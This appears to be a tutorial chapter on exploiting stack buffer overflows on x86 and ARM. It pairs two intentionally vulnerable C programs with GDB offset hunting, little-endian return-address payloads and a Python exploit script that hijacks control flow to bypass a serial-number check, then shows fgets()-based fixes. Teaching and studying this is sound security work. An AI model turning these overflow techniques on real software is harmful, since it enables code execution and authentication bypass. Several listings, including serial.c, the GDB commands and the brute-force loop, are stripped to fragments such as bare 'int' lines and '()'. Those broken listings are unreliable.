Introduction to exploit development - Part 2: Stack overflows
Overview
In Part 1, we configured lab environments for exploit development on both x86 and ARM. Next, we turn to the most basic memory-corruption bug, one that, surprisingly, is still behind many vulnerabilities today: the stack-based buffer overflow.
We'll cover memory layout, stack frames, and how buffer overflows enable control flow hijacking. We will also examine two deliberately vulnerable programs to see how writing past the end of a buffer corrupts adjacent memory, ultimately allowing us to redirect program execution.
Memory layout of a process
When a program executes, the operating system allocates several distinct memory regions, each serving a specific purpose. Understanding this layout is critical for exploit development, as different vulnerabilities target different regions.
A typical Linux process memory layout (from low to high addresses):
- .text segment: Contains the executable machine instructions (program code). This region is typically read-only to prevent code modification at runtime.
- .data segment: Contains initialized global and static variables. These values are set at compile time and persist for the program's lifetime.
- .bss segment: Contains uninitialized global and static variables. The name stands for "Block Started by Symbol" (historical reasons). These are zero-initialized at program start.
- Heap: Dynamically allocated memory region that grows upward (toward higher addresses). Managed via malloc(), calloc(), realloc(), and free() in C.
- Stack: Automatically managed memory for function call frames, local variables, and return addresses. Grows downward (toward lower addresses) on x86 and ARM architectures.
The stack and heap grow toward each other. If they collide, the program typically crashes with a stack overflow (not to be confused with stack buffer overflow, which we discuss below).
block-beta
columns 5
ADDR_G["0xbfffffff"]:1
G["Kernel space (top of user memory)"]:4
EMPTY1[" "]:1
F["Stack (grows downward ↓) - function calls"]:4
EMPTY2[" "]:1
E["(unused memory)"]:4
EMPTY3[" "]:1
D["Heap (grows upward ↑) - malloc/free"]:4
EMPTY4[" "]:1
C[".bss segment - uninitialized globals"]:4
ADDR_B["0x08049000"]:1
B[".data segment - initialized globals"]:4
ADDR_A["0x08048000"]:1
A[".text segment - executable code, read-only"]:4
style G fill:#fff,stroke:#8B7355,stroke-width:2px
style F fill:#fff,stroke:#6B8E23,stroke-width:2px
style E fill:#fff,stroke:#A9A9A9,stroke-width:2px
style D fill:#fff,stroke:#B8860B,stroke-width:2px
style C fill:#fff,stroke:#708090,stroke-width:2px
style B fill:#fff,stroke:#4682B4,stroke-width:2px
style A fill:#fff,stroke:#5F9EA0,stroke-width:2px
style ADDR_G fill:none,stroke:none
style ADDR_B fill:none,stroke:none
style ADDR_A fill:none,stroke:none
style EMPTY1 fill:none,stroke:none
style EMPTY2 fill:none,stroke:none
style EMPTY3 fill:none,stroke:none
style EMPTY4 fill:none,stroke:none
The diagram above illustrates this layout with typical x86 32-bit addresses. Note that modern systems with ASLR randomize most of these addresses on each execution, but we've disabled ASLR for learning purposes.
The call stack and stack frames
The stack is a Last-In-First-Out (LIFO) data structure used to manage function calls. Each function invocation creates a stack frame (also called an activation record) containing:
- Function arguments: Parameters passed to the function
- Return address: Memory address to return to after the function completes
- Saved frame pointer: Previous stack frame's base pointer (allows stack unwinding)
- Local variables: Function's automatic variables
On x86, two registers manage the stack:
- ESP (Stack Pointer): Points to the top of the stack (lowest address in current frame)
- EBP (Base/Frame Pointer): Points to the base of the current stack frame (used as a reference point for accessing local variables and parameters)
On ARM, equivalent registers are:
- SP (Stack Pointer): Same purpose as ESP on x86
- FP (Frame Pointer): Same purpose as EBP on x86 (though modern ARM code often omits frame pointers for optimization)
- LR (Link Register): Stores the return address instead of pushing it to the stack initially
Function prologue and epilogue
When a function is called, the prologue sets up the stack frame:
; x86 function prologue
push ebp ; Save old frame pointer
mov ebp, esp ; Establish new frame pointer
sub esp, N ; Allocate space for local variables
When the function returns, the epilogue tears down the frame:
; x86 function epilogue
mov esp, ebp ; Restore stack pointer
pop ebp ; Restore old frame pointer (a single leave instruction performs both of these steps)
ret ; Pop return address into EIP and jump
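The ret instruction is critical for exploitation. It pops a value from the stack into the instruction pointer (EIP on x86), transferring control to that address. 32-bit ARM has no ret instruction; a function typically returns by popping the saved LR value into PC (for example, pop {r7, pc}) or by branching with bx lr. In both cases, if we can overwrite the saved return address on the stack, we can redirect execution anywhere in memory.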
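To make the prologue and epilogue sequence concrete, here is a toy Python model of the x86 stack. It is only a sketch: the stack is a plain list whose end is the top, the frame pointer is a list index, and `enter_function` / `leave_function` are hypothetical helper names. The caller EBP value 0xBFFFF000 is made up for illustration; the two code addresses are the example values used elsewhere in this post.

```python
def enter_function(stack, return_address, caller_ebp, local_slots):
    """Model `call` plus the prologue; returns the new frame pointer (a list index)."""
    stack.append(return_address)      # call: push the return address
    stack.append(caller_ebp)          # push ebp
    ebp = len(stack) - 1              # mov ebp, esp
    stack.extend([0] * local_slots)   # sub esp, N
    return ebp


def leave_function(stack, ebp):
    """Model the epilogue; returns (restored_ebp, next_eip)."""
    del stack[ebp + 1:]               # mov esp, ebp: discard the locals
    restored_ebp = stack.pop()        # pop ebp
    next_eip = stack.pop()            # ret: pop the return address into EIP
    return restored_ebp, next_eip


stack = []
ebp = enter_function(stack, return_address=0x08048465,
                     caller_ebp=0xBFFFF000, local_slots=8)
normal = leave_function(list(stack), ebp)

# Corrupt the saved return address, which sits right next to the saved EBP.
corrupted = list(stack)
corrupted[ebp - 1] = 0x0804845F
hijacked = leave_function(corrupted, ebp)
print(hex(normal[1]), hex(hijacked[1]))
```

The epilogue code is identical in both runs; only the data in the return-address slot differs, and that alone decides where execution continues.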
Buffer overflow mechanics
A buffer overflow occurs when data written to a buffer exceeds its allocated size, overwriting adjacent memory. In C, functions like gets(), strcpy(), and scanf() with an unbounded %s perform no bounds checking, making them dangerous when handling untrusted input.
Consider a simple vulnerable function:
void
The buffer array is allocated on the stack with space for 30 bytes. If user input exceeds 30 bytes, the excess data overwrites memory beyond the buffer. On the stack, this means overwriting:
- The saved frame pointer (EBP)
- The saved return address
- Potentially other local variables or function arguments from calling functions
By carefully crafting input, an attacker can overwrite the saved return address with a pointer to malicious code (shellcode), redirecting execution when the function returns.
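The overwrite described above can be simulated in a few lines of Python. This is a sketch under stated assumptions, not a model of any particular compiler's output: it assumes the 30-byte buffer sits directly below the saved EBP with no alignment padding, and the helper names and the saved EBP value are hypothetical.

```python
import struct

BUFFER_SIZE = 30  # size of the local buffer, as in the text


def build_frame(saved_ebp, return_address):
    """Lay out buffer | saved EBP | return address, lowest address first."""
    return bytearray(BUFFER_SIZE) + struct.pack("<II", saved_ebp, return_address)


def unchecked_copy(frame, data):
    """Copy data plus a NUL terminator to the start of the buffer with no
    bounds check, which is how gets() behaves."""
    data = data + b"\x00"
    frame[0:len(data)] = data
    return frame


def saved_return_address(frame):
    """Read the 4-byte little-endian return address stored after the saved EBP."""
    return struct.unpack_from("<I", frame, BUFFER_SIZE + 4)[0]


safe = unchecked_copy(build_frame(0xBFFFF000, 0x08048465), b"A" * 10)
smashed = unchecked_copy(build_frame(0xBFFFF000, 0x08048465), b"A" * 34 + b"BBBB")
print(hex(saved_return_address(safe)), hex(saved_return_address(smashed)))
```

With short input the return address survives. With 34 bytes of filler followed by "BBBB", the filler covers the buffer and the saved EBP, and the last four bytes land in the return-address slot.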
Exploiting overflow.c
To understand buffer overflows concretely, we examine a vulnerable program and exploit it step by step.
overflow.c
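#include <stdio.h>

void return_input(void)
{
    char buffer[30];

    gets(buffer);            /* no bounds check: input longer than the buffer overflows it */
    printf("%s\n", buffer);  /* echo the input back */
}

int main(void)
{
    return_input();
    return 0;
}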
Compile with security mitigations disabled (as configured in Part 1):
# x86
# ARM
Finding the overflow offset
We use GDB to determine exactly how many bytes are needed to overwrite the return address. First, disassemble the return_input function:
(gdb) disassemble return_input
The disassembly reveals:
- The call to gets() where user input is read
- The ret instruction where the function returns using the saved return address
Set breakpoints at the gets() call and at the ret instruction:
()()()
At the first breakpoint (before gets()), examine the stack:
()
The saved return address should be visible on the stack. By examining the disassembly of main, we can verify what address the function should return to normally (let's say 0x08048465).
Now continue to allow gets() to read input. Provide a pattern that allows us to identify the offset:
AAAAAAAAAA BBBBBBBBBB CCCCCCCCCC DDDDDDDDDD
After entering this input, continue to the second breakpoint (at ret). Examine the stack again:
()
()
If the input was long enough, you'll see the saved return address has been overwritten with our pattern (e.g., 0x44444444 if we used 'D' characters). By counting characters, we determine the exact offset.
In this case, 34 bytes of padding are needed before the 4-byte return address is overwritten.
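Counting characters by hand is error-prone, so a pattern in which every 4-byte window is unique makes the lookup mechanical. The sketch below is one simple way to do it; `make_pattern` and `find_offset` are hypothetical helper names, and the pattern (each uppercase letter repeated four times) is just an illustrative choice.

```python
import string


def make_pattern(groups=26, width=4):
    """Build b"AAAABBBBCCCC...": each letter repeated `width` times."""
    return "".join(ch * width for ch in string.ascii_uppercase[:groups]).encode()


def find_offset(pattern, register_value, byteorder="little"):
    """Return the offset at which the 4 bytes found in EIP/PC occur in the
    pattern, or -1 if they are not part of it."""
    needle = register_value.to_bytes(4, byteorder)
    return pattern.find(needle)


pattern = make_pattern()
# If the overwritten return address reads 0x4a4a4949, the bytes in memory
# were "IIJJ" (little-endian), which start 34 bytes into the pattern.
print(find_offset(pattern, 0x4A4A4949))
```

Feed `pattern` to the program, read the overwritten return address in GDB, and pass that value to `find_offset`. The result is the number of padding bytes needed before the address.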
Redirecting execution
To prove we control the instruction pointer, we can overwrite the return address with the address of return_input itself, causing the function to be called twice.
From the GDB disassembly, suppose return_input is located at 0x0804845f. We construct our payload:
payload = b"A" * 34 + b"\x5f\x84\x04\x08"
Note the address is in little-endian format (least significant byte first), as x86 is a little-endian architecture.
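Rather than reversing the bytes by hand, the conversion can be left to Python's `struct` module. A minimal sketch, using the example address and offset from the text (the constant names are hypothetical, and your address will differ):

```python
import struct

RETURN_INPUT_ADDR = 0x0804845F  # example address from the text
PADDING_LENGTH = 34             # offset found for the x86 build

# "<I" means little-endian, unsigned 32-bit integer.
address_bytes = struct.pack("<I", RETURN_INPUT_ADDR)
payload = b"A" * PADDING_LENGTH + address_bytes

print(address_bytes.hex(), len(payload))
```

Packing the integer this way avoids transposition mistakes when the address changes between builds.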
Automating exploitation with Python
Manual exploitation via GDB is cumbersome and tedious, so let's automate the process with a simple Python script:
exploit.py
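#!/usr/bin/env python3
import subprocess


# NOTE: the function name and the "./overflow" path are placeholders; adjust them to your setup.
def exploit(program_path, padding_length, shellcode):
    """
    Executes the target program and pipes a payload into STDIN.
    Args:
        program_path: Path to the program to execute/exploit
        padding_length: Number of padding bytes before shellcode
        shellcode: The address or code to execute
    Returns:
        Decoded stdout from the target program
    """
    payload = b"A" * padding_length + shellcode
    # Use stdbuf to disable C stdio buffering (prevents output loss on crash)
    result = subprocess.run(["stdbuf", "-o0", program_path],
                            input=payload + b"\n", stdout=subprocess.PIPE)
    return result.stdout.decode(errors="replace")


shellcode = (0x0804845f).to_bytes(4, byteorder='little')  # Address of return_input
padding_length = 34
print(exploit("./overflow", padding_length, shellcode))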
Running this script redirects execution to return_input a second time, demonstrating control over the instruction pointer.
Architecture-specific offsets
The padding length of 34 bytes demonstrated above is specific to x86 architecture. ARM has different stack frame layouts and calling conventions due to its RISC design and use of the link register (LR). You'll need to determine the correct offset for your target architecture.
Finding the offset on ARM:
Use GDB with a unique pattern to identify where the return address is overwritten:
()
()
The PC (program counter) register will contain part of your pattern. For example, if pc = 0x4a4a4a4a (ASCII "JJJJ"), count the position of "JJJJ" in your pattern to determine the offset. In this case, "JJJJ" appears at byte 36, so 36 bytes of padding are needed on ARM.
Next, find the runtime address of return_input:
()
()
# Enter any input to hit the breakpoint
()
This shows the actual runtime address where the function is loaded in memory. The disassemble output shows relative offsets, not absolute addresses. On ARM, you might see something like {void (void)} 0x40052c <return_input>, indicating the function is at address 0x40052c at runtime.
ARM Thumb mode consideration:
ARM processors support two instruction set modes: ARM mode (32-bit instructions) and Thumb mode (16-bit instructions, mixed with 32-bit ones under Thumb-2). Modern ARM code is typically compiled in Thumb mode for better code density. When jumping to a Thumb mode function, you must set the least significant bit (LSB) of the address to 1. This tells the processor to execute in Thumb mode. If you don't set the LSB, the processor will try to execute Thumb instructions as ARM instructions, resulting in a SIGILL (Illegal Instruction) error.
To check if your function uses Thumb mode, look at the GDB disassembly - if instructions are 2-byte aligned (e.g., 0x52c, 0x52e, 0x530), it's Thumb mode.
Use this address in your exploit with the LSB set:
# Set LSB to 1 for Thumb mode (0x10424 | 1 = 0x10425)
shellcode = (0x10424 | 1).to_bytes(4, byteorder='little')
padding_length = 36 # ARM offset
Note architectural differences between x86 and ARM exploitation:
- Register names: ARM uses PC (program counter) instead of EIP, and LR (link register) for return addresses
- Stack layout: ARM's push {r7, lr} prologue differs from x86's push ebp; mov ebp, esp
- Offsets: Due to different calling conventions, buffer overflow offsets vary between architectures
Exploiting serial.c
This second example presents a more fun/realistic scenario: bypassing authentication logic. The code is adapted from The Shellcoder's Handbook, 2nd Edition by Chris Anley et al.
serial.c
int
int
int
int
int
This program implements a serial number validation scheme. The valid_serial() function checks whether a provided string meets specific criteria:
- Length must be at least 10 characters
- All characters must be between '0' (ASCII 48) and 'z' (ASCII 122)
- The sum of all character ASCII values modulo 853 must equal 83
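The three checks are easy to mirror in Python, which is handy for testing candidate strings without running the binary. This is a sketch of the rules as listed above, not the original C code:

```python
def valid_serial(serial: str) -> bool:
    """Apply the three serial-number rules described in the text."""
    if len(serial) < 10:                # rule 1: at least 10 characters
        return False
    total = 0
    for ch in serial:
        if not ("0" <= ch <= "z"):      # rule 2: ASCII 48..122 only
            return False
        total += ord(ch)
    return total % 853 == 83            # rule 3: checksum


# Nine 'a' characters (9 * 97 = 873) plus '?' (63) sum to 936 = 853 + 83.
print(valid_serial("aaaaaaaaa?"))
print(valid_serial("0000000000"))
```

The second call fails only the checksum rule: ten '0' characters sum to 480, and 480 % 853 is not 83.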
Finding a legitimate serial satisfying these constraints is technically possible but nontrivial. However, validate_serial() uses fscanf() with %s, which performs no bounds checking on the 24-byte serial buffer...so, buffer overflow time!
Bypassing validation
Instead of finding a valid serial number, we overflow the buffer to overwrite the return address of validate_serial(), redirecting execution directly to do_valid_stuff().
Using GDB, find the address of do_valid_stuff(). We then need to determine the correct padding length to reach the saved return address.
Since we don't know the exact offset, we can brute force it programmatically by making some modifications to the exploit.py program we created earlier:
= # Address of do_valid_stuff()
# shellcode = (0x1059c | 1).to_bytes(4, byteorder='little') # For ARM
=
break
This loop tries padding lengths from 24 to 34 bytes. When the correct offset is found (typically around 28 bytes for this program), the overflow redirects execution to do_valid_stuff(), bypassing the serial validation entirely.
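The brute-force idea can be written as a small self-contained helper. This is a sketch under stated assumptions: `run_target` and `find_padding` are hypothetical names, and the success text, program path, and target address are placeholders you would fill in from your own GDB session.

```python
import subprocess


def run_target(program_path, payload):
    """Pipe payload into the program's STDIN and return its decoded stdout."""
    result = subprocess.run([program_path], input=payload + b"\n",
                            stdout=subprocess.PIPE)
    return result.stdout.decode(errors="replace")


def find_padding(run, target_address, lengths, success_marker):
    """Return the first padding length whose output contains success_marker,
    or None if no candidate length works."""
    shellcode = target_address.to_bytes(4, byteorder="little")
    for padding_length in lengths:
        output = run(b"A" * padding_length + shellcode)
        if success_marker in output:
            return padding_length
    return None


# Example call (all three values are placeholders):
# find_padding(lambda p: run_target("./serial", p),
#              DO_VALID_STUFF_ADDR, range(24, 35), SUCCESS_TEXT)
```

Passing the runner in as a callable keeps the search loop separate from process handling, so the loop can be checked against a stub before it is pointed at the real binary.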
Understanding the implications
These simple examples illustrate a fundamental security principle: memory safety violations enable arbitrary code execution. By corrupting the saved return address, we can redirect program flow to:
- Existing functions (as demonstrated above)
- Shellcode injected into memory (covered in Part 3)
- ROP gadgets for advanced exploitation (also covered in Part 3)
The vulnerability stems from:
- Unsafe functions that don't validate input bounds (gets(), strcpy(), scanf(), fscanf())
- Languages (like C) that don't enforce memory safety by default
- The stack storing both data (local variables) and control flow information (return addresses) adjacently
Modern systems implement multiple mitigations against these attacks (ASLR, stack canaries, NX/DEP), but understanding the fundamental mechanics remains essential for both offensive and defensive security work (and for a general understanding of how code execution works!).
Fixing the vulnerabilities
Fixing overflow.c
Replace gets() with the bounds-checked fgets():
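void return_input(void)
{
    char buffer[30];

    fgets(buffer, sizeof(buffer), stdin);  /* reads at most sizeof(buffer) - 1 bytes */
    printf("%s", buffer);                  /* fgets() keeps the newline, so none is added */
}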
The fgets() function requires the buffer size as a parameter, preventing overflows.
Fixing serial.c
Replace fscanf() with fgets(), but handle the trailing newline that fgets() includes:
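int validate_serial(void)
{
    char serial[24];

    if (fgets(serial, sizeof(serial), stdin) == NULL)
        return 0;
    serial[strcspn(serial, "\n")] = '\0';  /* strip the trailing newline */
    return valid_serial(serial);
}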
The strcspn() function finds the newline character and replaces it with a null terminator, ensuring valid_serial() receives the expected format.
Next steps
We now understand how buffer overflows corrupt the stack and enable control flow hijacking. In Part 3, we explore how to leverage this control by injecting and executing arbitrary machine code (shellcode) on both x86 and ARM architectures.
We will learn to:
- Write position-independent shellcode in assembly
- Avoid null bytes that terminate string functions
- Use NOP sleds for reliable exploitation
- Apply Return-Oriented Programming (ROP) when the stack is non-executable
- Compare exploitation techniques across x86 and ARM architectures
References
- The Shellcoder's Handbook: Discovering and Exploiting Security Holes - Chris Anley, John Heasman, Felix Lindner, Gerardo Richarte
- Smashing The Stack For Fun And Profit - Aleph One (Phrack Magazine)
- Hacking: The Art of Exploitation - Jon Erickson
- Python subprocess documentation
- Removing trailing newline from fgets() input - Stack Overflow